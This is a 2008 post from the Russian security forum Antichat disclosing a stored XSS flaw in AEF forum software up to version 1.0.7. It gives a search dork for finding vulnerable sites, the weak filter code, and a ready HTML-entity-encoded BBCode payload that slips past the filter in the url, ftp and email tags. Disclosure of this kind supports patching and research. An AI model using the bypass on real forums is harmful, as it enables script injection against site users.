HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Aef <= 1.0.7 Активные Xss
  #15  
Старый 04.10.2008, 21:34
Grey
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
С нами: 10483586

Репутация: 5826


По умолчанию Aef <= 1.0.7 Активные Xss

AEF <= 1.0.7 Активные XSS

Дорк: Powered By AEF 1.0.

Уязвимы сразу несколько тегов, т.к. проверка там везде однинаковая.
Поразительно тупую защиту от XSS:

Код:
function check_url($href, $name){
	
	$href = preg_replace("/javascript:/i", "javascript-aef: ", $href);
	
	return '<a href="'.$href.'" target="_blank">'.$name.'</a>';

}
обойти проще некуда - достаточно перекодировать скрипт:

Код:
javascript:alert('Grey') => HTML (with semicolons): => &#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3A;&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x27;&#x47;&#x72;&#x65;&#x79;&#x27;&#x29;
Уязвимы теги: [url*], [ftp*], [email*].

Эксплуатация: при добавление сообщения, добавляем один из уязвимых тегов.

К примеру [url*]:

Код:
[url*=&#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3A;&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x27;&#x47;&#x72;&#x65;&#x79;&#x27;&#x29;]нажми на меня[/url*]
при переходе по ссылке выполнится скрипт.

Символ "*" - следует убрать.

Последний раз редактировалось Grey; 04.10.2008 в 21:37..
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Обзор уязвимостей phpBB] qBiN Уязвимости CMS / форумов 115 07.08.2022 16:12
[Обзор уязвимостей vBulletin] bandera Уязвимости CMS / форумов 167 17.10.2019 18:14
[Обзор уязвимостей myBB] Goudini Уязвимости CMS / форумов 25 03.08.2011 08:20
[Обзор уязвимостей Phorum] _-[A.M.D]HiM@S-_ Уязвимости CMS / форумов 11 23.05.2010 13:42



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.